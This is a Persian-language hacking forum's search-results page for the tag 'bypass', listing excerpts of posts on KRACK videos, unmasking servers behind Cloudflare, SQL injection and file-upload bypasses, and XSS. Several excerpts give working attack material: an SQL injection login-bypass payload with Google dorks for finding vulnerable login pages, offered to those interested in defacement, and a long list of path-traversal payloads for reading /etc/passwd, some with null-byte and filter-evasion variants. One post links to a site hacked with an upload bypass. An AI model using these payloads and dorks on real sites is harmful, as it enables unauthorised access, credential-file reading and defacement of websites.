جستجو در تالار

در حال نمایش نتایج برای برچسب های 'bypass'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


Product Groups

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالار ها

  • اخبار و اعلانات انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • بخش مسابقات انجمن
    • انتقادات و پیشنهادات
    • افتخارات و اطلاعیه های تیم گارد ایران
    • بخش ارتقاء کاربران
    • اخبار هک و امنیت
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • بخش های خصوصی انجمن گاردایران
    • سوال و جواب های عمومی
    • بخش خصوصی
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

دسته ها

  • ویدیوهای آموزشی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


محل سکونت


Interests

11 نتیجه پیدا شد

  1. آموزش ساده ای هست و مفهوم krack رو به راحتی به بیننده نشون میده. حمله خطرناک krack این هست که بدون داشتن پسورد یک مودم و ورود به شبکه داخلی بین موبایل و مودم، بتونید ببینید موبایل چه اطلاعاتی رو داره از طریق مودم ردوبدل میکنه. آموزش به زبان انگلیسی و استفاده شده از محیط های شبیه سازی اندروید دانلود شده از Youtube رمز عبور: guardiran.org KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part1.rar KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part2.rar KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part3.rar KRACK Attacks- Bypassing WPA2 against Android and Linux - YouTube.part4.rar
  2. با سلام خدمت همه ی دوستان خیلی از وبمستر ها از Cloudflare برای ماسک گذاری آی پی سرورشون بمنظور حفاظت در برابر حملات DDOS استفاده می کنن.Cloudflare با نشستن بین کلاینت ها و سرور کار خودش رو انجام میده. با این میانجی گری های Cloudflare، ای پی یک سرور تا زمانی که کلاینت ها از طریق CloudFlare بهش متصل بشن، هیچوقت کشف نخواهد شد. هر حمله ای که صورت میگیره اول از همه به سمت CloudFlare مسیردهی میشه و به بن بست میخوره اما راه های دیگه ای وجود دارن که حمله کننده با اونها میتونه آی پی اصلی سرور رو شناسایی کنه و مستقیماً اقدام به حمله بکنه. در اینجا چندین روش رو میخوام توضیح بدم، یه توضیح خلاصه ای در خصوص پس زمینه ی تئوریک چگونگی و چرایی عملکرد Cloudflare ارائه بدم و بعدش هم توضیحاتی رو در خصوص حل اون موانع بگم: 1- DNS Resolution پس زمینه: اساسی ترین تکنیک اکثر Resolver ها (جاهایی که آی پی محافظت شده توسط CloudFlare رو کشف و اعلام می کنند) استفاده از روش بروت فورس رکورد های DNS هست. اما اول، بذارید توضیح کوچیکی بدم که این چطور کار میکنه. فرض کنید شما صاحب وبسایت example.com با ای پی سرور 111.111.111.111 هستید. عملکرد کلاسیک Cloudflare به شرح عکس زیر هست: بطور خلاصه، شما مدیریت DNS خودتون رو میدید دست CloudFlare. رکورد A دامنه ی شما (که توی عکس نوشتم "وبسایت بدون حفاظ شما") به آدرس آی پی شبکه گسترده و جهانی CloudFlare تغییر پیدا میکنه. الان دیگه کلیه اتصالات به وبسایت example.com بجای آی پی اصلی به آی پی CloudFlare (مثلا 222.222.222.222) ارسال میشن و CloudFlare هم درخواست های پراکسی بین بازدید کننده ها و سرور اصلی رو رزرو میکنه تا این اتصال با وجود یک واسط ایجاد بشه. موضوع این هست که CloudFlare فقط ارتباطات HTTP/HTTPS (پورت های 80 و 443) دریافتی از فضای سراسری وب به ای پی سرور شما رو پراکسی میکنه و از طریق پورت دیگه ای نمیتونه شما رو مخفی بکنه. اینجا چه اتفاقی میفته؟ ماجرا اینه که با وارد کردن آدرس example.com توی مرورگر شما از طریف پورت HTTP یا HTTPS به آی پی 222.222.222.222 وصل میشید ولی اگر بزنید ftp.example.com امکان ارتباط از طریق پورت 21 یا هر سرویس در حال اجرای دیگه ای به وبسایت رو ندارید. چونکه Cloudflare نمیاد پورت 21 شما رو هم محافظت کنه. سرور های CloudFlare به FTP (پورت 21)، SSH (پورت22)، cPanel (پورت 2082) و غیره جواب نمیدن. یک سوال؟ اگر CloudFlare به این درخواست های من جواب نمیده پس چطور مدیر وبسایت به سرور میتونه وصل بشه؟ این جوابی هست که خود CloudFlare داده: راه حل اینه که به سادگی یک رکورد DNS بسازید مثل direct.example.com که بتونید ارتباط مستقیمی به سرور داشته باشید. (مدیرانی که آی پی سرور براشون مهم هست و ممکنه اتصال مستقیمشون به سرور از طریق شبکه ردیابی بشه، این ارتباط رو با پراکسی های دیگه انجام میدن چونکه اگر بدون ملاحظه مسایل امنیتی بخوان مستقیم به سرور وصل بشن ممکنه توی شبکه ی LAN دیده بشه و آی پی لو بره) حمله: حالا فرض کنید که قصد حمله داریم. اگر آدرس example.com رو پینگ کنیم متوجه میشیم که ویژگی حفاظت توسط CloudFlare فعال شده و به این معنی هست که example.com و www.example.com هر دوشون یه ای پی دارن که اونم متعلق به CloudFlare هست. با استفاده از توضیحاتی که بعنوان پس زمینه دادم، میدونید که مدیر کل وبسایت احتمالا زیردامنه های دیگه ای که بطور مستقیم به سرور اصلی متصل میشن و توسط CloudFlare محافظت نمیشن رو ایجاد کرده. خب به راحتی میتونید حدس بزنید این آدرس ها چی هستند و بعدش اونها رو پینگ کنید. بعضی از زیردامنه های عمومی و مشهور mail ، ftp ، ssh ، direct هستند. مثلا webmail.example.com mail.example.com ftp.example.com ssh.example.com direct.example.com باز هم میگم که این روش توسط همه ی Resolver ها (Cloudflare IP resolvers/scripts) مورد استفاده قرار میگیره. برای نمونه اینجا کلیک کنید. (توی این لینک آدرس وبسایتی که میخواد رو وارد کنید و روی Search DNS کلیک کنید. میبینید که این سایت با استفاده از روشی که گفتم DNS هایی که بنظرش ممکنه وجود داشته باشه رو جستجو میکنه و اگر وجود داشته باشن، آی پی شون رو جلوشون مینویسه. همچنین در پایین صفحه به شما میگه که آیا وبسایت توسط CloudFlare تحت محافظت هست یا نه. آی پی CloudFlare هم نشونتون میده) ضد حمله: انجام عملیات های DNS Resolution بر روی وب سایت های محافظت شده توسط CloudFlare یک نوع حمله ی رایج در بین حمله کنندگان هست که اکثر ادمین های محتاط سعی میکنند مواظب زیردامنه های معمول و قابل حمله باشند. اگر شما بعنوان ادمین وبسایت قصد دارید که بدون وجود زیردامنه به سرور اصلی خود متصل شوید، هم می توانید یه دامنه ی کاملا جداگانه ایجاد کنید (مثلا connect.example2.com) و یا اینکه در محیطی امن بصورت مستقیم به سرور خود وصل شوید. *** 2- تاریخچه DNS/Hosting پس زمینه: اگر شما بعنوان ادمین در حال فعال سازی سرویس CloudFlare برای وب خود هستید (example.com)، این رو باید در نظر بگیرید که وب شما از اول کار در دسترس بوده و یه آی پی عمومی هم داشته (111.111.111.111) اگر یک وبسایت برای مدتی (تقریباً یک ماه) بر روی یک آی پی یکسان هاست شده باشه، امکان داره که یه خزنده ی وب (Web Crawler) بهش دسترسی پیدا کرده باشه. خیلی از این خزنده ها جزئیات وبسایت رو بصورت گزارش ذخیره می کنند و ارائه میدن. حمله: حمله کننده میتونه به راحتی تاریخچه ی هاستینگ وبسایت رو توی دیتابیس های مختلف جستجو کنه (LOOK UP) و بفهمه که قبل از راه اندازی سرویس CloudFlare، آی پی سرور اصلی چی بوده. توی تاپیک زیر دو سرویس رایگان برای همچنین حمله ای معرفی کردم: ضد حمله: خوشبختانه حل این معضل امنیتی هم ساده س. اگر دارید وبسایتی رو راه اندازی میکنید و میخواد که آی پی سرور اصلی خودتون رو مخفی نگه دارید، حتماً قبل از اینکه دامنه رو به هاست متصل کنید، سرویس CloudFlare رو تنظیم و فعال کنید. اگر هم آی پی سرور اصلی شما قبلا جایی در دسترس بوده و گزارشی ازش وجود داره، بهترین کار تعویض آی پی هست. اون قدر ها هم سخت نیست که یه آی پی جدید برای هاستتون گیر بیارید. مطمئن بشید که آی پی قدیمی به سرور شما وصل نمیشه
  3. proxy

    معنی هک: هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه می‌باشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان می‌شود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانه‌ای است؛ و کرک نیز به معنی رمزگشایی است و کراکر (به انگلیسی: Cracker) به فرد گشاینده رمز می‌گویند. باگ چیست؟ باگ نوعی خطا یا اشتباه در اجرای نرم افزار است که موجب نتایج اشتباه یا اجرا نشدن نرم افزار می‌شود. علت این اشکالات می‌تواند اشتباه در هنگام برنامه نویسی باشد. شرکت های سازنده نرم فزارها برای حل این مشکل قبل از ارائه نسخه نهایی نسخه‌هایی تحت نام بتا یا آلفا انتشار می‌دهند تا افرادی آنها را بررسی کنند و این باگ‌ها را گزارش کنند. و هکر میتواند با استفاده از باگ به نرمافزار نفوذ کرده و به هدف خود برسد. شل چیست؟ شل یک ابزار برنامه نویسی شده است که هکر با آپلود کردن اون روی سایت می تواند کارهای مورد نظر خودش رو مانند حذف یا دانلود فایلها و خواندن اطلاعات دیتابیس یا ... رو انجام دهد سی ام اس چیست؟ سی ام اس یا cms سیستم مدیریت محتوا مانند جوملا و وردپرس و..... پورت چیست؟ به راه های ورودی و خروجی اطاعات در سیستم پورت گفته میشه که مانند درهای یک خونه هستند اکسپلویت چیست؟ زمانی که هکر یک باگ رو کشف میکنه برای اینکه بتواند دفعه بعد با سرعت بیشتری نفوذ رو انجام بدهد یک کد مینویسد که عمل نفوذ رو انجام دهد که به آن اکسپلویت گفته می شود. آی پی چیست؟ به آدرس یک سیستم در بستر اینترنت یا شبکه آی پی ip گفته میشود دفیس و مس دفیس چیست؟ زمانی که صفحه سایت مورد نفوذ تغیر پیدا کرد در اصطلاح میگویند که سایت دفیس شده است حال اگر صفحه چند سایت با آی پی های یکسان تغییر پیدا کند میگویند که مس دفیس اتفاق افتاده است بایپس چیست؟ به عبور کردن از موانع بایپس میگویند مانند وقتی به سایتی نفوذ می کنید که safe mode آن فعال هست برای اجرا کردن دستورات خود بر روی شل به مشکل بر می خورید و دلیل آن هم وجود firewall سرور هست . برای اینکه بتوانید دستورات خود را بر روی شل اجرا کنید ولی firewall گیر ندهد باید آن را bypass (دور زدن firewall ) کنید . اگه چیزی رو از قلم انداختم بگید فقط دوستان لطف کنید به چت روم تبدیل نکنید اینجا رو ممنون
  4. proxy

    سلام یک بایپس دیدم گفتم بزارم دوستان هم استفاده کنن برای دوستان مبتدی فیلم هم قرار دادم user:' OR 1 --+ password:' OR 1 --+ dork:inurl:emplogin.php intext:"Employer's Login" dork:inurl:login.php intext:"Employer's Login" امیدوارم مفید باشه دوستانی که به دفیس علاقه دارن بهم پیام بدن bypass.rar
  5. سلام اینم اموزش عالی و کاربردی { bypass error 500 } توی بیشتر سایت ها ادمین برخی قسمت ها رو غیرقابل دسترسی میکنه که یکی از اون ها میتونه قسمت ذخیره شدنه پسورد و یوزرنیم باشه. شما با بایپس کردن این بخش ها میتونیدکار های زیادی انجام بدین. رمز فایل : gaurdiran.org تشکر فراموش نشه بایپس.rar
  6. درود ../ با آموزش بایپس انواع آپلودر در خدمتتون هستیم در این روش ما دیفیس پیج خودمون رو به سادگی آپلود میکنیم خیلی از سرویس دهندگان آپلودر این باگ رو دارن باگ توسط اعضای تیم امنیتی گارد ایران کشف شده (MR.IMAN , Reza.Attacker , 1TED) کلیپ در دو پارت تقسیم بندی شده رمز فایل فشرده: guardiran.org لینک اثبات یکی از سایت های هک شده با این روش http://aljyyosh.org/mirror.php?id=171298 یا حـ ـق ../ 22-07-2016 01-21-51 ب-ظ.part1.rar 22-07-2016 01-21-51 ب-ظ.part2.rar
  7. بسم الله الرحمن الرحیم با اجازه ی دوستان می خوام تحولی در بایپس ها ایجاد کنم! ( البته با کمک دوستان) می خوام کاملترین آموزش بایپس ها SQL رو از مبتدی تا پیشرفته توی انجمن قرار بدم. انشاالله با کمک دوستان می خواهم جامع ترین تاپیک بایپس های اس کیو ال رو بزنیم. دوستان هم اگه بایپس خاصی رو بلدند حتی اگر priv8 هستش رو توی خصوصی به من بگویند تا توی آموزش ها ازش استفاده بشود. سعی میشه توی آموزشات تمامی بایپس ها توضح داده بشه و بایپسی از زیر دستمون در نره. J همچنین برای هر دستور یک پارت در نظر گرفته شده. (تا بتوانیم به طور جامع به هر دستور بپردازیم.) قوانین رو هم بلدید ، من دیگه متذکر نمیشم. با تشکر.
  8. در این تاپیک بایپس های باگ محبوب sql injection رو مطرح می کنیم. لطفا سوالات رو در بخش سوال و جواب مطرح کنید. قبل از قرار دادن آموزش با بنده هماهنگ کنید. تاپیک با مدیر عزیز C0d3!Nj3ct!0N هماهنگ شده
  9. درود در این قسمت آموزش بایپس bypass در باگ Sql Injection رو براتون اماده کردم . پیشنهاد میکنم این تاپیک رو هم ببینید : تاپیک جامع نفوذ به سایت +فیلم های آموزشی همونطور که می دونید باگ Sql Injection دارای بایپس های زیادی داره و در این فیلم آموزشی هم یکی از آموزشهای خوبشو به شما یاد میدم . یکی از بهترین Bypass های باگ Sql Injection بایپس Union Select هست و توضیحات کامل هست و با دیدن فیلم خیلی از مشکلات شما برای تارگتهای دیگه برطرف میشه . پسورد : guardiran.org موفق باشید bupass2.rar
  10. kingdeface

    یکسری از دستورات بایپس Bypass در باگ LFI رو برای شما عزیزان قرار دادم التبه تنها به این دستورات ختم نخواهد شد و این دستورات برای زمانی هست که شما نمی تونید در تارگت مورد نظر از etc /passwd استفاده کنید : /etc/passwd ./etc/passwd ../etc/passwd ../../etc/passwd ../../../etc/passwd ../../../../etc/passwd ../../../../../etc/passwd ../../../../../../etc/passwd ../../../../../../../etc/passwd ../../../../../../../../etc/passwd ../../../../../../../../../etc/passwd ../../../../../../../../../../etc/passwd ../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../../../etc/passwd ----------------------------------------------------------------------------------- ....//etc/passwd ....//....//etc/passwd ....//....//....//etc/passwd ....//....//....//....//etc/passwd ....//....//....//....//....//etc/passwd ....//....//....//....//....//....//etc/passwd ....//....//....//....//....//....//....//etc/passwd ....//....//....//....//....//....//....//....//etc/passwd ....//....//....//....//....//....//....//....//....//etc/passwd ....//....//....//....//....//....//....//....//....//....//etc/passwd ------------------------------------------------------------------------------------ ../../etc/passwd%00 ../../../etc/passwd%00 ../../../../etc/passwd%00 ../../../../../etc/passwd%00 ../../../../../../etc/passwd%00 ../../../../../../../etc/passwd%00 ../../../../../../../../etc/passwd%00 ../../../../../../../../../etc/passwd%00 ../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../../../../../etc/passwd%00 ------------------------------------------------------------------------------------- ....//etc/passwd%00 ....//....//etc/passwd%00 ....//....//....//etc/passwd%00 ....//....//....//....//etc/passwd%00 ....//....//....//....//....//etc/passwd%00 ....//....//....//....//....//....//etc/passwd%00 ....//....//....//....//....//....//....//etc/passwd%00 ....//....//....//....//....//....//....//....//etc/passwd%00 ....//....//....//....//....//....//....//....//....//etc/passwd%00 ....//....//....//....//....//....//....//....//....//....//etc/passwd%00
  11. C0d3!Nj3ct!0n

    با سلام همونطور که شما دوستان می دونید باگ XSS مخفف Cross Site Scripting هست و قصد دارم در این تاپیک بای پس های باگ ( Xss Bypass Command ) را برای اعضاء محترم تیم امنیتی گارد ایران قرار میدم . لطفا اسپم ندید